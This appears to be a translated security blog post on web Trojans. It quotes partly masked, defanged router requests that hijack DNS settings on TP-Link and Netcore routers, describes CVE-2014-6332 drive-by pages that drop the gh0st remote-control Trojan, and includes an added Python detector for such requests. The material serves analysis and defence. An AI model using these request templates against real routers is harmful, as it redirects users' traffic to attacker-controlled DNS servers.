Changes in web Trojans
Web Trojans ("net horses") have always been a battlefield that never quiets down. Of the Trojan types captured before, a considerable part were found by embedding malicious code in a page: once a weakly protected host visits the page it is easily hit, and the Trojan author can then carry out follow-up operations to achieve their goals.
Judging from captured attack samples, many attacks target routers. Both TP-Link series and Netcore series routers have suffered different kinds of attacks, mainly because of defects in the router firmware. Some of them are listed below:
I. TP-Link series routers
1. Modify the DNS of the DHCP service; parameters: dnsserver and dnsserver2:
hxxp://XXX:XXX@192.168.1.1/XXX/XXXXXX.XXX?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=133.XXX.XXX.251&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6
2. Modify the DNS of the WAN port; parameters: dnsserver and dnsserver2:
hxxp://xxx:xxx@192.168.1.1/XXX/XXX.XXX?wan=0&lcpMru=1492&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=&dnsserver=122.xxx.xxx.93&dnsserver2=8.8.8.8&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Submit=%B1%A3+%B4%E6&Advanced=Advanced&btn_Submit=%B1%A3+%B4%E6
II. Netcore series routers
1. Modify the DNS parameters of the DHCP service: dns1, dns2 and dns3:
hxxp://xxx:xxx@192.168.1.1/xxx/xxx.xxx?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1=192.168.1.2&dhcp_end_ip1=192.168.1.254&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1=133.xxx.xxx.251&dns2=8.8.8.8&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88
2. Modify the DNS parameters of the WAN port: dns1 and dns2:
hxxp://xxx:xxx@192.168.1.1/XXX/XXX.XXX?user=<user>&pass=<pass>&mac=<mac_current>&mac_clone_btn=MAC%E5%9C%B0%E5%9D%80%E5%85%8B%E9%9A%86&mac_def_btn2=%E6%81%A2%E5%A4%8D%E7%BC%BA%E7%9C%81MAC&mtu=<mtu>&up_bandwidth=<up_bandwidth>&down_bandwidth=<down_bandwidth>&work_mode_radio=ROUTE&work_mode=<work_mode>&isp_radio=AUTO&isp=<isp>&line_detect=<line_detect>&time=1&timer_enable=<timer_enable>&monday=1&tuesday=2&wednesday=3&thursday=4&friday=5&saturday=6&sunday=7&timer_day=<timer_day>&start_hour=<start_hour>&start_minute=<start_minute>&end_hour=<end_hour>&end_minute=<end_minute>&pppoe_conf_radio=MANU&out_time=<out_time>&pppoe_conf=MANU&server_name=<server_name>&ac_name=<ac_name>&dns1=<dns1>&dns2=<dns2>&submitbutton=%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88&uiname=<uiname>&connect_type=<connect_type>
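As an added defender's example (not code from the original post), the following Python parses request URLs of the kind quoted above, as seen in proxy logs or in the source of an injected page, and flags any that point a LAN gateway's DHCP or WAN DNS settings at an address outside private space. The sample URLs are constructed: the paths are placeholders like the masked ones above, and 203.0.113.251 stands in for the masked DNS address.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# DNS parameter names from the TP-Link (dnsserver/dnsserver2) and
# Netcore (dns1/dns2/dns3) requests quoted above.
DNS_PARAMS = {"dnsserver", "dnsserver2", "dns1", "dns2", "dns3"}

# RFC 1918 plus loopback, checked explicitly so that documentation
# ranges such as 203.0.113.0/24 count as external in the samples below.
LAN_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def classify_ip(value):
    """Return 'lan', 'external', or 'other' (not a parseable IP address)."""
    try:
        ip = ipaddress.ip_address(value)
    except ValueError:
        return "other"
    return "lan" if any(ip in net for net in LAN_NETS) else "external"

def analyze_url(url):
    """Return a finding for a request that sets DNS on a LAN gateway, else None.

    The finding is suspicious when any DNS value lies outside private space,
    which is what the hijacking requests above do (they also carry the
    router login as user:pass@ inside the URL).
    """
    u = urlsplit(url.replace("hxxp://", "http://", 1))  # undo defanging
    gateway = u.hostname or ""
    if classify_ip(gateway) != "lan":
        return None  # not aimed at a LAN device
    dns = {}
    for key, values in parse_qs(u.query, keep_blank_values=True).items():
        if key.lower() in DNS_PARAMS:
            non_empty = [v for v in values if v]  # "dnsserver=&dnsserver=x" keeps x
            if non_empty:
                dns[key] = non_empty[-1]
    if not dns:
        return None
    external = sorted(v for v in dns.values() if classify_ip(v) == "external")
    return {"gateway": gateway, "embedded_creds": u.username is not None,
            "dns": dns, "external_dns": external, "suspicious": bool(external)}

def scan(urls):
    """Run analyze_url over a list of request URLs and keep the suspicious ones."""
    return [f for f in (analyze_url(x) for x in urls) if f and f["suspicious"]]

# Constructed sample requests (placeholder paths, documentation-range DNS address).
SAMPLE_URLS = [
    "hxxp://admin:admin@192.168.1.1/XXX/XXXXXX.XXX?dhcpserver=1&dnsserver=203.0.113.251&dnsserver2=8.8.8.8&Save=1",
    "http://192.168.1.1/XXX/XXX.XXX?dns1=192.168.1.1&dns2=&submitbutton=save",
    "http://example.com/page?dns1=203.0.113.5",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_URLS):
        print(finding)
```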
However, as manufacturers upgraded their products, the effectiveness of attacks such as these router attacks began to decline, and some Trojan writers turned to better exploitation methods. Recently Microsoft disclosed CVE-2014-6332 and released the corresponding patch; at the same time, exploit samples appeared online, leading to large-scale web Trojan intrusions of websites. A user who has not installed the latest patch is prone to attack when visiting a Trojan-infected website, ending up as a "zombie" in the Trojan author's hands.
An iframe tag on the website's homepage embeds an HTML page containing the script.
When this VBScript is triggered, the browser downloads the remote-control Trojan and implants it on the visitor's computer; browsers from IE3 to IE11 are known to be affected.
Judging from the scope of captured attacks, there are currently tampered pages at various levels across industries nationwide, either intentionally tampered with or infected with Trojans.
A very small part is listed below:
Most of them are pornographic sites.
A gh0st remote-control Trojan is implanted on the visitor's computer, and the check-in protocol marker has not even been changed.
Victim machines can easily be controlled by others: file uploading, screen control, or use in C&C attacks.
Against this kind of "net horse", installing security patches promptly and developing good browsing habits are both essential. For CVE-2014-6332 in particular, 360 Browser also gives a corresponding prompt: